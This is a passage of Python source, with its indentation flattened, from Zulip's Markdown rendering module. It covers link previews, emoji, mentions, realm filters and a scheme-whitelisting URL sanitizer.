if parsed_url.path == '/' and len(parsed_url.fragment) > 5:
to_match = parsed_url.fragment
tweet_id_match = re.match(r'^!?/.*?/status(es)?/(?P<tweetid>\d{10,18})(/photo/[0-9])?/?$', to_match)
if not tweet_id_match:
return None
return tweet_id_match.group("tweetid")
class InlineHttpsProcessor(markdown.treeprocessors.Treeprocessor):
def run(self, root):
# type: (Element) -> None
# Get all URLs from the blob
found_imgs = walk_tree(root, lambda e: e if e.tag == "img" else None)
for img in found_imgs:
url = img.get("src")
if not url.startswith("http://"):
# Don't rewrite images on our own site (e.g. emoji).
continue
img.set("src", get_camo_url(url))
class InlineInterestingLinkProcessor(markdown.treeprocessors.Treeprocessor):
TWITTER_MAX_IMAGE_HEIGHT = 400
TWITTER_MAX_TO_PREVIEW = 3
def __init__(self, md, bugdown):
# type: (markdown.Markdown, Bugdown) -> None
# Passing in bugdown for access to config to check if realm is zulip.com
self.bugdown = bugdown
markdown.treeprocessors.Treeprocessor.__init__(self, md)
def is_image(self, url):
# type: (Text) -> bool
if not settings.INLINE_IMAGE_PREVIEW:
return False
parsed_url = urllib.parse.urlparse(url)
# List from http://support.google.com/chromeos/bin/answer.py?hl=en&answer=183093
for ext in [".bmp", ".gif", ".jpg", "jpeg", ".png", ".webp"]:
if parsed_url.path.lower().endswith(ext):
return True
return False
def dropbox_image(self, url):
# type: (Text) -> Optional[Dict]
# TODO: specify details of returned Dict
parsed_url = urllib.parse.urlparse(url)
if (parsed_url.netloc == 'dropbox.com' or parsed_url.netloc.endswith('.dropbox.com')):
is_album = parsed_url.path.startswith('/sc/') or parsed_url.path.startswith('/photos/')
# Only allow preview Dropbox shared links
if not (parsed_url.path.startswith('/s/') or
parsed_url.path.startswith('/sh/') or
is_album):
return None
# Try to retrieve open graph protocol info for a preview
# This might be redundant right now for shared links for images.
# However, we might want to make use of title and description
# in the future. If the actual image is too big, we might also
# want to use the open graph image.
image_info = fetch_open_graph_image(url)
is_image = is_album or self.is_image(url)
# If it is from an album or not an actual image file,
# just use open graph image.
if is_album or not is_image:
# Failed to follow link to find an image preview so
# use placeholder image and guess filename
if image_info is None:
return None
image_info["is_image"] = is_image
return image_info
# Otherwise, try to retrieve the actual image.
# This is because open graph image from Dropbox may have padding
# and gifs do not work.
# TODO: What if image is huge? Should we get headers first?
if image_info is None:
image_info = dict()
image_info['is_image'] = True
parsed_url_list = list(parsed_url)
parsed_url_list[4] = "dl=1" # Replaces query
image_info["image"] = urllib.parse.urlunparse(parsed_url_list)
return image_info
return None
def youtube_id(self, url):
# type: (Text) -> Optional[Text]
if not settings.INLINE_IMAGE_PREVIEW:
return None
# Youtube video id extraction regular expression from http://pastebin.com/KyKAFv1s
# If it matches, match.group(2) is the video id.
youtube_re = r'^((?:https?://)?(?:youtu\.be/|(?:\w+\.)?youtube(?:-nocookie)?\.com/)' + \
r'(?:(?:(?:v|embed)/)|(?:(?:watch(?:_popup)?(?:\.php)?)?(?:\?|#!?)(?:.+&)?v=)))' + \
r'?([0-9A-Za-z_-]+)(?(1).+)?$'
match = re.match(youtube_re, url)
if match is None:
return None
return match.group(2)
def youtube_image(self, url):
# type: (Text) -> Optional[Text]
yt_id = self.youtube_id(url)
if yt_id is not None:
return "https://i.ytimg.com/vi/%s/default.jpg" % (yt_id,)
def twitter_text(self, text, urls, user_mentions, media):
# type: (Text, List[Dict[Text, Text]], List[Dict[Text, Any]], List[Dict[Text, Any]]) -> Element
"""
Use data from the twitter API to turn links, mentions and media into A
tags.
This works by using the urls, user_mentions and media data from the
twitter API.
The first step is finding the locations of the URLs, mentions and media
in the text. For each match we build a dictionary with the start
location, end location, the URL to link to, and the text to show in the
link.
Next we sort the matches by start location. And for each we add the
text from the end of the last link to the start of the current link to
the output. The text needs to added to the text attribute of the first
node (the P tag) or the tail the last link created.
Finally we add any remaining text to the last node.
"""
to_linkify = [] # type: List[Dict[Text, Any]]
# Build dicts for URLs
for url_data in urls:
short_url = url_data["url"]
full_url = url_data["expanded_url"]
for match in re.finditer(re.escape(short_url), text, re.IGNORECASE):
to_linkify.append({
'start': match.start(),
'end': match.end(),
'url': short_url,
'text': full_url,
})
# Build dicts for mentions
for user_mention in user_mentions:
screen_name = user_mention['screen_name']
mention_string = u'@' + screen_name
for match in re.finditer(re.escape(mention_string), text, re.IGNORECASE):
to_linkify.append({
'start': match.start(),
'end': match.end(),
'url': u'https://twitter.com/' + force_text(urllib.parse.quote(force_str(screen_name))),
'text': mention_string,
})
# Build dicts for media
for media_item in media:
short_url = media_item['url']
expanded_url = media_item['expanded_url']
for match in re.finditer(re.escape(short_url), text, re.IGNORECASE):
to_linkify.append({
'start': match.start(),
'end': match.end(),
'url': short_url,
'text': expanded_url,
})
to_linkify.sort(key=lambda x: x['start'])
p = current_node = markdown.util.etree.Element('p')
def set_text(text):
# type: (Text) -> None
"""
Helper to set the text or the tail of the current_node
"""
if current_node == p:
current_node.text = text
else:
current_node.tail = text
current_index = 0
for link in to_linkify:
# The text we want to link starts in already linked text skip it
if link['start'] < current_index:
continue
# Add text from the end of last link to the start of the current
# link
set_text(text[current_index:link['start']])
current_index = link['end']
current_node = a = url_to_a(link['url'], link['text'])
p.append(a)
# Add any unused text
set_text(text[current_index:])
return p
def twitter_link(self, url):
# type: (Text) -> Optional[Element]
tweet_id = get_tweet_id(url)
if tweet_id is None:
return None
try:
res = fetch_tweet_data(tweet_id)
if res is None:
return None
user = res['user'] # type: Dict[Text, Any]
tweet = markdown.util.etree.Element("div")
tweet.set("class", "twitter-tweet")
img_a = markdown.util.etree.SubElement(tweet, 'a')
img_a.set("href", url)
img_a.set("target", "_blank")
profile_img = markdown.util.etree.SubElement(img_a, 'img')
profile_img.set('class', 'twitter-avatar')
# For some reason, for, e.g. tweet 285072525413724161,
# python-twitter does not give us a
# profile_image_url_https, but instead puts that URL in
# profile_image_url. So use _https if available, but fall
# back gracefully.
image_url = user.get('profile_image_url_https', user['profile_image_url'])
profile_img.set('src', image_url)
text = unescape(res['text'])
urls = res.get('urls', [])
user_mentions = res.get('user_mentions', [])
media = res.get('media', []) # type: List[Dict[Text, Any]]
p = self.twitter_text(text, urls, user_mentions, media)
tweet.append(p)
span = markdown.util.etree.SubElement(tweet, 'span')
span.text = u"- %s (@%s)" % (user['name'], user['screen_name'])
# Add image previews
for media_item in media:
# Only photos have a preview image
if media_item['type'] != 'photo':
continue
# Find the image size that is smaller than
# TWITTER_MAX_IMAGE_HEIGHT px tall or the smallest
size_name_tuples = list(media_item['sizes'].items())
size_name_tuples.sort(reverse=True,
key=lambda x: x[1]['h'])
for size_name, size in size_name_tuples:
if size['h'] < self.TWITTER_MAX_IMAGE_HEIGHT:
break
media_url = u'%s:%s' % (media_item['media_url_https'], size_name)
img_div = markdown.util.etree.SubElement(tweet, 'div')
img_div.set('class', 'twitter-image')
img_a = markdown.util.etree.SubElement(img_div, 'a')
img_a.set('href', media_item['url'])
img_a.set('target', '_blank')
img_a.set('title', media_item['url'])
img = markdown.util.etree.SubElement(img_a, 'img')
img.set('src', media_url)
return tweet
except:
# We put this in its own try-except because it requires external
# connectivity. If Twitter flakes out, we don't want to not-render
# the entire message; we just want to not show the Twitter preview.
logging.warning(traceback.format_exc())
return None
def get_url_data(self, e):
# type: (Element) -> Optional[Tuple[Text, Text]]
if e.tag == "a":
if e.text is not None:
return (e.get("href"), force_text(e.text))
return (e.get("href"), e.get("href"))
return None
def run(self, root):
# type: (Element) -> None
# Get all URLs from the blob
found_urls = walk_tree(root, self.get_url_data)
# If there are more than 5 URLs in the message, don't do inline previews
if len(found_urls) == 0 or len(found_urls) > 5:
return
rendered_tweet_count = 0
for (url, text) in found_urls:
dropbox_image = self.dropbox_image(url)
if dropbox_image is not None:
class_attr = "message_inline_ref"
is_image = dropbox_image["is_image"]
if is_image:
class_attr = "message_inline_image"
# Not making use of title and description of images
add_a(root, dropbox_image['image'], url,
title=dropbox_image.get('title', ""),
desc=dropbox_image.get('desc', ""),
class_attr=class_attr)
continue
if self.is_image(url):
add_a(root, url, url, title=text)
continue
if get_tweet_id(url) is not None:
if rendered_tweet_count >= self.TWITTER_MAX_TO_PREVIEW:
# Only render at most one tweet per message
continue
twitter_data = self.twitter_link(url)
if twitter_data is None:
# This link is not actually a tweet known to twitter
continue
rendered_tweet_count += 1
div = markdown.util.etree.SubElement(root, "div")
div.set("class", "inline-preview-twitter")
div.insert(0, twitter_data)
continue
youtube = self.youtube_image(url)
if youtube is not None:
yt_id = self.youtube_id(url)
add_a(root, youtube, url, None, None, None, "youtube-video message_inline_image", yt_id)
continue
class Avatar(markdown.inlinepatterns.Pattern):
def handleMatch(self, match):
# type: (Match[Text]) -> Optional[Element]
img = markdown.util.etree.Element('img')
email_address = match.group('email')
img.set('class', 'message_body_gravatar')
img.set('src', '/avatar/%s?s=30' % (email_address,))
img.set('title', email_address)
img.set('alt', email_address)
return img
emoji_tree = os.path.join(settings.STATIC_ROOT, "third", "gemoji", "images", "emoji")
path_to_emoji = os.path.join(emoji_tree, '*.png')
path_to_unicode_emoji = os.path.join(emoji_tree, 'unicode', '*.png')
emoji_list = [os.path.splitext(os.path.basename(fn))[0] for fn in glob.glob(path_to_emoji)]
unicode_emoji_list = [os.path.splitext(os.path.basename(fn))[0] for fn in glob.glob(path_to_unicode_emoji)]
def make_emoji(emoji_name, src, display_string):
# type: (Text, Text, Text) -> Element
elt = markdown.util.etree.Element('img')
elt.set('src', src)
elt.set('class', 'emoji')
elt.set("alt", display_string)
elt.set("title", display_string)
return elt
class UnicodeEmoji(markdown.inlinepatterns.Pattern):
def handleMatch(self, match):
# type: (Match[Text]) -> Optional[Element]
orig_syntax = match.group('syntax')
name = hex(ord(orig_syntax))[2:]
if name in unicode_emoji_list:
src = '/static/third/gemoji/images/emoji/unicode/%s.png' % (name)
return make_emoji(name, src, orig_syntax)
else:
return None
class Emoji(markdown.inlinepatterns.Pattern):
def handleMatch(self, match):
# type: (Match[Text]) -> Optional[Element]
orig_syntax = match.group("syntax")
name = orig_syntax[1:-1]
realm_emoji = {} # type: Dict[Text, Dict[str, Text]]
if db_data is not None:
realm_emoji = db_data['emoji']
if current_message and name in realm_emoji:
return make_emoji(name, realm_emoji[name]['display_url'], orig_syntax)
elif name in emoji_list:
src = '/static/third/gemoji/images/emoji/%s.png' % (name)
return make_emoji(name, src, orig_syntax)
else:
return None
class StreamSubscribeButton(markdown.inlinepatterns.Pattern):
# This markdown extension has required javascript in
# static/js/custom_markdown.js
def handleMatch(self, match):
# type: (Match[Text]) -> Element
stream_name = match.group('stream_name')
stream_name = stream_name.replace('\\)', ')').replace('\\\\', '\\')
span = markdown.util.etree.Element('span')
span.set('class', 'inline-subscribe')
span.set('data-stream-name', stream_name)
button = markdown.util.etree.SubElement(span, 'button')
button.text = 'Subscribe to ' + stream_name
button.set('class', 'inline-subscribe-button btn')
error = markdown.util.etree.SubElement(span, 'span')
error.set('class', 'inline-subscribe-error')
return span
class ModalLink(markdown.inlinepatterns.Pattern):
"""
A pattern that allows including in-app modal links in messages.
"""
def handleMatch(self, match):
# type: (Match[Text]) -> Element
relative_url = match.group('relative_url')
text = match.group('text')
a_tag = markdown.util.etree.Element("a")
a_tag.set("href", relative_url)
a_tag.set("title", relative_url)
a_tag.set("data-toggle", "modal")
a_tag.text = text
return a_tag
upload_title_re = re.compile(u"^(https?://[^/]*)?(/user_uploads/\\d+)(/[^/]*)?/[^/]*/(?P<filename>[^/]*)$")
def url_filename(url):
# type: (Text) -> Text
"""Extract the filename if a URL is an uploaded file, or return the original URL"""
match = upload_title_re.match(url)
if match:
return match.group('filename')
else:
return url
def fixup_link(link, target_blank=True):
# type: (markdown.util.etree.Element, bool) -> None
"""Set certain attributes we want on every link."""
if target_blank:
link.set('target', '_blank')
link.set('title', url_filename(link.get('href')))
def sanitize_url(url):
# type: (Text) -> Text
"""
Sanitize a url against xss attacks.
See the docstring on markdown.inlinepatterns.LinkPattern.sanitize_url.
"""
try:
parts = urllib.parse.urlparse(url.replace(' ', '%20'))
scheme, netloc, path, params, query, fragment = parts
except ValueError:
# Bad url - so bad it couldn't be parsed.
return ''
# If there is no scheme or netloc and there is a '@' in the path,
# treat it as a mailto: and set the appropriate scheme
if scheme == '' and netloc == '' and '@' in path:
scheme = 'mailto'
elif scheme == '' and netloc == '' and len(path) > 0 and path[0] == '/':
# Allow domain-relative links
return urllib.parse.urlunparse(('', '', path, params, query, fragment))
elif (scheme, netloc, path, params, query) == ('', '', '', '', '') and len(fragment) > 0:
# Allow fragment links
return urllib.parse.urlunparse(('', '', '', '', '', fragment))
# Zulip modification: If scheme is not specified, assume http://
# We re-enter sanitize_url because netloc etc. need to be re-parsed.
if not scheme:
return sanitize_url('http://' + url)
locless_schemes = ['mailto', 'news', 'file']
if netloc == '' and scheme not in locless_schemes:
# This fails regardless of anything else.
# Return immediately to save additional proccessing
return None
# Upstream code will accept a URL like javascript://foo because it
# appears to have a netloc. Additionally there are plenty of other
# schemes that do weird things like launch external programs. To be
# on the safe side, we whitelist the scheme.
if scheme not in ('http', 'https', 'ftp', 'mailto', 'file'):
return None
# Upstream code scans path, parameters, and query for colon characters
# because
#
# some aliases [for javascript:] will appear to urllib.parse to have
# no scheme. On top of that relative links (i.e.: "foo/bar.html")
# have no scheme.
#
# We already converted an empty scheme to http:// above, so we skip
# the colon check, which would also forbid a lot of legitimate URLs.
# Url passes all tests. Return url as-is.
return urllib.parse.urlunparse((scheme, netloc, path, params, query, fragment))
def url_to_a(url, text = None):
# type: (Text, Optional[Text]) -> Union[Element, Text]
a = markdown.util.etree.Element('a')
href = sanitize_url(url)
if href is None:
# Rejected by sanitize_url; render it as plain text.
return url
if text is None:
text = markdown.util.AtomicString(url)
a.set('href', href)
a.text = text
fixup_link(a, 'mailto:' not in href[:7])
return a
class VerbosePattern(markdown.inlinepatterns.Pattern):
def __init__(self, pattern):
# type: (Text) -> None
markdown.inlinepatterns.Pattern.__init__(self, ' ')
# HACK: we just had python-markdown compile an empty regex.
# Now replace with the real regex compiled with the flags we want.
self.pattern = pattern
self.compiled_re = re.compile(u"^(.*?)%s(.*?)$" % pattern,
re.DOTALL | re.UNICODE | re.VERBOSE)
class AutoLink(VerbosePattern):
def handleMatch(self, match):
# type: (Match[Text]) -> ElementStringNone
url = match.group('url')
return url_to_a(url)
class UListProcessor(markdown.blockprocessors.UListProcessor):
""" Process unordered list blocks.
Based on markdown.blockprocessors.UListProcessor, but does not accept
'+' or '-' as a bullet character."""
TAG = 'ul'
RE = re.compile(u'^[ ]{0,3}[*][ ]+(.*)')
class BugdownUListPreprocessor(markdown.preprocessors.Preprocessor):
""" Allows unordered list blocks that come directly after a
paragraph to be rendered as an unordered list
Detects paragraphs that have a matching list item that comes
directly after a line of text, and inserts a newline between
to satisfy Markdown"""
LI_RE = re.compile(u'^[ ]{0,3}[*][ ]+(.*)', re.MULTILINE)
HANGING_ULIST_RE = re.compile(u'^.+\\n([ ]{0,3}[*][ ]+.*)', re.MULTILINE)
def run(self, lines):
# type: (List[Text]) -> List[Text]
""" Insert a newline between a paragraph and ulist if missing """
inserts = 0
fence = None
copy = lines[:]
for i in range(len(lines) - 1):
# Ignore anything that is inside a fenced code block
m = FENCE_RE.match(lines[i])
if not fence and m:
fence = m.group('fence')
elif fence and m and fence == m.group('fence'):
fence = None
# If we're not in a fenced block and we detect an upcoming list
# hanging off a paragraph, add a newline
if (not fence and lines[i] and
self.LI_RE.match(lines[i+1]) and
not self.LI_RE.match(lines[i])):
copy.insert(i+inserts+1, '')
inserts += 1
return copy
# Based on markdown.inlinepatterns.LinkPattern
class LinkPattern(markdown.inlinepatterns.Pattern):
""" Return a link element from the given match. """
def handleMatch(self, m):
# type: (Match[Text]) -> Optional[Element]
href = m.group(9)
if not href:
return None
if href[0] == "<":
href = href[1:-1]
href = sanitize_url(self.unescape(href.strip()))
if href is None:
return None
el = markdown.util.etree.Element('a')
el.text = m.group(2)
el.set('href', href)
fixup_link(el, target_blank = (href[:1] != '#'))
return el
def prepare_realm_pattern(source):
# type: (Text) -> Text
""" Augment a realm filter so it only matches after start-of-string,
whitespace, or opening delimiters, won't match if there are word
characters directly after, and saves what was matched as "name". """
return r"""(?<![^\s'"\(,:<])(?P<name>""" + source + ')(?!\w)'
# Given a regular expression pattern, linkifies groups that match it
# using the provided format string to construct the URL.
class RealmFilterPattern(markdown.inlinepatterns.Pattern):
""" Applied a given realm filter to the input """
def __init__(self, source_pattern, format_string, markdown_instance=None):
# type: (Text, Text, Optional[markdown.Markdown]) -> None
self.pattern = prepare_realm_pattern(source_pattern)
self.format_string = format_string
markdown.inlinepatterns.Pattern.__init__(self, self.pattern, markdown_instance)
def handleMatch(self, m):
# type: (Match[Text]) -> Union[Element, Text]
return url_to_a(self.format_string % m.groupdict(),
m.group("name"))
class UserMentionPattern(markdown.inlinepatterns.Pattern):
def find_user_for_mention(self, name):
# type: (Text) -> Tuple[bool, Dict[str, Any]]
if db_data is None:
return (False, None)
if mention.user_mention_matches_wildcard(name):
return (True, None)
user = db_data['full_names'].get(name.lower(), None)
if user is None:
user = db_data['short_names'].get(name.lower(), None)
return (False, user)
def handleMatch(self, m):
# type: (Match[Text]) -> Optional[Element]
name = m.group(2) or m.group(3)
if current_message:
wildcard, user = self.find_user_for_mention(name)
if wildcard:
current_message.mentions_wildcard = True
email = "*"
elif user:
current_message.mentions_user_ids.add(user['id'])
name = user['full_name']
email = user['email']
else:
# Don't highlight @mentions that don't refer to a valid user
return None
el = markdown.util.etree.Element("span")
el.set('class', 'user-mention')
el.set('data-user-email', email)
el.text = "@%s" % (name,)
return el
class StreamPattern(VerbosePattern):
def find_stream_by_name(self, name):
# type: (Match[Text]) -> Dict[str, Any]
if db_data is None:
return None
stream = db_data['stream_names'].get(name)
return stream
def handleMatch(self, m):
# type: (Match[Text]) -> Optional[Element]
name = m.group('stream_name')
if current_message:
stream = self.find_stream_by_name(name)
if stream is None:
return None
el = markdown.util.etree.Element('a')
el.set('class', 'stream')
el.set('data-stream-id', str(stream['id']))
# TODO: We should quite possibly not be specifying the
# href here and instead having the browser auto-add the
# href when it processes a message with one of these, to
# provide more clarity to API clients.
el.set('href', '/#narrow/stream/{stream_name}'.format(
stream_name=urllib.parse.quote(force_str(name))))
el.text = u'#{stream_name}'.format(stream_name=name)
return el
class AlertWordsNotificationProcessor(markdown.preprocessors.Preprocessor):
def run(self, lines):
# type: (Iterable[Text]) -> Iterable[Text]
if current_message and db_data is not None:
# We check for custom alert words here, the set of which are
# dependent on which users may see this message.
#
# Our caller passes in the list of possible_words. We
# don't do any special rendering; we just append the alert words
# we find to the set current_message.alert_words.
realm_words = db_data['possible_words']
content = '\n'.join(lines).lower()
allowed_before_punctuation = "|".join([r'\s', '^', r'[\(\".,\';\[\*`>]'])
allowed_after_punctuation = "|".join([r'\s', '$', r'[\)\"\?:.,\';\]!\*`]'])
for word in realm_words:
escaped = re.escape(word.lower())
match_re = re.compile(u'(?:%s)%s(?:%s)' %
(allowed_before_punctuation,
escaped,
allowed_after_punctuation))
if re.search(match_re, content):
current_message.alert_words.add(word)
return lines
# This prevents realm_filters from running on the content of a
# Markdown link, breaking up the link. This is a monkey-patch, but it
# might be worth sending a version of this change upstream.
class AtomicLinkPattern(LinkPattern):
def handleMatch(self, m):
# type: (Match[Text]) -> Optional[Element]
ret = LinkPattern.handleMatch(self, m)
if ret is None:
return None
if not isinstance(ret, six.string_types):
ret.text = markdown.util.AtomicString(ret.text)
return ret
class Bugdown(markdown.Extension):
def __init__(self, *args, **kwargs):
# type: (*Any, **Union[bool, None, Text]) -> None
# define default configs
self.config = {
"realm_filters": [kwargs['realm_filters'], "Realm-specific filters for domain"],
"realm": [kwargs['realm'], "Realm name"]
}
super(Bugdown, self).__init__(*args, **kwargs)
def extendMarkdown(self, md, md_globals):
# type: (markdown.Markdown, Dict[str, Any]) -> None
del md.preprocessors['reference']
for k in ('image_link', 'image_reference', 'automail',
'autolink', 'link', 'reference', 'short_reference',
'escape', 'strong_em', 'emphasis', 'emphasis2',
'linebreak', 'strong'):
del md.inlinePatterns[k]
try:
# linebreak2 was removed upstream in version 3.2.1, so
# don't throw an error if it is not there
del md.inlinePatterns['linebreak2']
except Exception:
pass
md.preprocessors.add("custom_text_notifications", AlertWordsNotificationProcessor(md), "_end")
# Custom bold syntax: **foo** but not __foo__
md.inlinePatterns.add('strong',
markdown.inlinepatterns.SimpleTagPattern(r'(\*\*)([^\n]+?)\2', 'strong'),
'>not_strong')
# Custom strikethrough syntax: ~~foo~~
md.inlinePatterns.add('del',
markdown.inlinepatterns.SimpleTagPattern(r'(?<!~)(\~\~)([^~{0}\n]+?)\2(?!~)', 'del'),
'>strong')
# Text inside ** must start and end with a word character
# it need for things like "const char *x = (char *)y"
md.inlinePatterns.add(
'emphasis',
markdown.inlinepatterns.SimpleTagPattern(r'(\*)(?!\s+)([^\*^\n]+)(?<!\s)\*', 'em'),
'>strong')
for k in ('hashheader', 'setextheader', 'olist', 'ulist'):
del md.parser.blockprocessors[k]
md.parser.blockprocessors.add('ulist', UListProcessor(md.parser), '>hr')
# Note that !gravatar syntax should be deprecated long term.
md.inlinePatterns.add('avatar', Avatar(r'!avatar\((?P<email>[^)]*)\)'), '>backtick')
md.inlinePatterns.add('gravatar', Avatar(r'!gravatar\((?P<email>[^)]*)\)'), '>backtick')
md.inlinePatterns.add('stream_subscribe_button',
StreamSubscribeButton(r'!_stream_subscribe_button\((?P<stream_name>(?:[^)\\]|\\\)|\\)*)\)'), '>backtick')
md.inlinePatterns.add(
'modal_link',
ModalLink(r'!modal_link\((?P<relative_url>[^)]*), (?P<text>[^)]*)\)'),
'>avatar')
md.inlinePatterns.add('usermention', UserMentionPattern(mention.find_mentions), '>backtick')
stream_group = r"""
(?<![^\s'"\(,:<]) # Start after whitespace or specified chars
\#\*\* # and after hash sign followed by double asterisks
(?P<stream_name>[^\*]+) # stream name can contain anything
\*\* # ends by double asterisks
"""
md.inlinePatterns.add('stream', StreamPattern(stream_group), '>backtick')
md.inlinePatterns.add('emoji', Emoji(r'(?P<syntax>:[\w\-\+]+:)'), '_end')
md.inlinePatterns.add('unicodeemoji', UnicodeEmoji(
u'(?P<syntax>[\U0001F300-\U0001F64F\U0001F680-\U0001F6FF\u2600-\u26FF\u2700-\u27BF])'),
'_end')
# The equalent JS regex is \ud83c[\udf00-\udfff]|\ud83d[\udc00-\ude4f]|\ud83d[\ude80-\udeff]|
# [\u2600-\u26FF]|[\u2700-\u27BF]. See below comments for explanation. The JS regex is used
# by marked.js for frontend unicode emoji processing.
# The JS regex \ud83c[\udf00-\udfff]|\ud83d[\udc00-\ude4f] represents U0001F300-\U0001F64F
# The JS regex \ud83d[\ude80-\udeff] represents \U0001F680-\U0001F6FF
# Similiarly [\u2600-\u26FF]|[\u2700-\u27BF] represents \u2600-\u26FF\u2700-\u27BF
md.inlinePatterns.add('link', AtomicLinkPattern(markdown.inlinepatterns.LINK_RE, md), '>avatar')
for (pattern, format_string, id) in self.getConfig("realm_filters"):
md.inlinePatterns.add('realm_filters/%s' % (pattern,),
RealmFilterPattern(pattern, format_string), '>link')
# A link starts at a word boundary, and ends at space, punctuation, or end-of-input.
#
# We detect a url either by the `https?://` or by building around the TLD.
# In lieu of having a recursive regex (which python doesn't support) to match
# arbitrary numbers of nested matching parenthesis, we manually build a regexp that
# can match up to six
# The inner_paren_contents chunk matches the innermore non-parenthesis-holding text,
# and the paren_group matches text with, optionally, a matching set of parens
inner_paren_contents = r"[^\s()\"]*"
paren_group = r"""
[^\s()\"]*? # Containing characters that won't end the URL
(?: \( %s \) # and more characters in matched parens
[^\s()\"]*? # followed by more characters
)* # zero-or-more sets of paired parens
"""
nested_paren_chunk = paren_group
for i in range(6):
nested_paren_chunk = nested_paren_chunk % (paren_group,)
nested_paren_chunk = nested_paren_chunk % (inner_paren_contents,)
tlds = '|'.join(list_of_tlds())
link_regex = r"""
(?<![^\s'"\(,:<]) # Start after whitespace or specified chars
# (Double-negative lookbehind to allow start-of-string)
(?P<url> # Main group
(?:(?: # Domain part
https?://[\w.:@-]+? # If it has a protocol, anything goes.
|(?: # Or, if not, be more strict to avoid false-positives
(?:[\w-]+\.)+ # One or more domain components, separated by dots
(?:%s) # TLDs (filled in via format from tlds-alpha-by-domain.txt)
)
)
(?:/ # A path, beginning with /
%s # zero-to-6 sets of paired parens
)?) # Path is optional
| (?:[\w.-]+\@[\w.-]+\.[\w]+) # Email is separate, since it can't have a path
%s # File path start with file:///, enable by setting ENABLE_FILE_LINKS=True
)
(?= # URL must be followed by (not included in group)
[!:;\?\),\.\'\"\>]* # Optional punctuation characters
(?:\Z|\s) # followed by whitespace or end of string
)
""" % (tlds, nested_paren_chunk,
r"| (?:file://(/[^/ ]*)+/?)" if settings.ENABLE_FILE_LINKS else r"")
md.inlinePatterns.add('autolink', AutoLink(link_regex), '>link')
md.preprocessors.add('hanging_ulists',
BugdownUListPreprocessor(md),
"_begin")
md.treeprocessors.add("inline_interesting_links", InlineInterestingLinkProcessor(md, self), "_end")
if settings.CAMO_URI:
md.treeprocessors.add("rewrite_to_https", InlineHttpsProcessor(md), "_end")
if self.getConfig("realm") == "zephyr_mirror":
# Disable almost all inline patterns for zephyr mirror
# users' traffic that is mirrored. Note that
# inline_interesting_links is a treeprocessor and thus is
# not removed
for k in list(md.inlinePatterns.keys()):
if k not in ["autolink"]:
del md.inlinePatterns[k]
for k in list(md.treeprocessors.keys()):
if k not in ["inline_interesting_links", "inline", "rewrite_to_https"]:
del md.treeprocessors[k]
for k in list(md.preprocessors.keys()):
if k not in ["custom_text_notifications"]:
del md.preprocessors[k]
for k in list(md.parser.blockprocessors.keys()):
if k not in ["paragraph"]:
del md.parser.blockprocessors[k]
md_engines = {}
realm_filter_data = {} # type: Dict[Text, List[Tuple[Text, Text, int]]]
class EscapeHtml(markdown.Extension):
def extendMarkdown(self, md, md_globals):
# type: (markdown.Markdown, Dict[str, Any]) -> None
del md.preprocessors['html_block']
del md.inlinePatterns['html']
def make_md_engine(key, opts):
# type: (Text, Dict[str, Any]) -> None
md_engines[key] = markdown.Markdown(
output_format = 'html',
extensions = [
'markdown.extensions.nl2br',
'markdown.extensions.tables',
codehilite.makeExtension(
linenums=False,
guess_lang=False
),
fenced_code.makeExtension(),
EscapeHtml(),
Bugdown(realm_filters=opts["realm_filters"][0],
realm=opts["realm"][0])])
def subject_links(domain, subject):
# type: (Text, Text) -> List[Text]
from zerver.models import get_realm, RealmFilter, realm_filters_for_domain
matches = [] # type: List[Text]
realm_filters = realm_filters_for_domain(domain)
for realm_filter in realm_filters:
pattern = prepare_realm_pattern(realm_filter[0])
for m in re.finditer(pattern, subject):
matches += [realm_filter[1] % m.groupdict()]
return matches
def make_realm_filters(domain, filters):
# type: (Text, List[Tuple[Text, Text, int]]) -> None
global md_engines, realm_filter_data
if domain in md_engines:
del md_engines[domain]
realm_filter_data[domain] = filters
# Because of how the Markdown config API works, this has confusing
# large number of layers of dicts/arrays :(
make_md_engine(domain, {"realm_filters": [filters, "Realm-specific filters for %s" % (domain,)],
"realm": [domain, "Realm name"]})
def maybe_update_realm_filters(domain):
# type: (Optional[Text]) -> None
from zerver.models import realm_filters_for_domain, all_realm_filters
# If domain is None, load all filters
if domain is None:
all_filters = all_realm_filters()
all_filters['default'] = []
for domain, filters in six.iteritems(all_filters):
make_realm_filters(domain, filters)
# Hack to ensure that getConfig("realm") is right for mirrored Zephyrs
make_realm_filters("zephyr_mirror", [])
else:
realm_filters = realm_filters_for_domain(domain)
if domain not in realm_filter_data or realm_filter_data[domain] != realm_filters:
# Data has changed, re-load filters
make_realm_filters(domain, realm_filters)
# We want to log Markdown parser failures, but shouldn't log the actual input
# message for privacy reasons. The compromise is to replace all alphanumeric
# characters with 'x'.
#
# We also use repr() to improve reproducibility, and to escape terminal control
# codes, which can do surprisingly nasty things.
_privacy_re = re.compile(u'\\w', flags=re.UNICODE)
def _sanitize_for_log(content):
# type: (Text) -> Text
return repr(_privacy_re.sub('x', content))
# Filters such as UserMentionPattern need a message, but python-markdown
# provides no way to pass extra params through to a pattern. Thus, a global.
current_message = None # type: Optional[Message]
# We avoid doing DB queries in our markdown thread to avoid the overhead of
# opening a new DB connection. These connections tend to live longer than the
# threads themselves, as well.
db_data = None # type: Dict[Text, Any]
def log_bugdown_error(msg):
# type: (str) -> None
"""We use this unusual logging approach to log the bugdown error, in
order to prevent AdminZulipHandler from sending the santized
original markdown formatting into another Zulip message, which
could cause an infinite exception loop."""
logging.getLogger('').error(msg)
def do_convert(content, realm_domain=None, message=None, possible_words=None):
# type: (Text, Optional[Text], Optional[Message], Optional[Set[Text]]) -> Optional[Text]
"""Convert Markdown to HTML, with Zulip-specific settings and hacks."""
from zerver.models import get_active_user_dicts_in_realm, get_active_streams, UserProfile
if message:
maybe_update_realm_filters(message.get_realm().domain)
if realm_domain in md_engines:
_md_engine = md_engines[realm_domain]
else:
if 'default' not in md_engines:
maybe_update_realm_filters(domain=None)
_md_engine = md_engines["default"]
# Reset the parser; otherwise it will get slower over time.
_md_engine.reset()
global current_message
current_message = message
# Pre-fetch data from the DB that is used in the bugdown thread
global db_data
if message:
realm_users = get_active_user_dicts_in_realm(message.get_realm())
realm_streams = get_active_streams(message.get_realm()).values('id', 'name')
if possible_words is None:
possible_words = set() # Set[Text]
db_data = {'possible_words': possible_words,
'full_names': dict((user['full_name'].lower(), user) for user in realm_users),
'short_names': dict((user['short_name'].lower(), user) for user in realm_users),
'emoji': message.get_realm().get_emoji(),
'stream_names': dict((stream['name'], stream) for stream in realm_streams)}
try:
# Spend at most 5 seconds rendering.
# Sometimes Python-Markdown is really slow; see
# https://trac.zulip.net/ticket/345
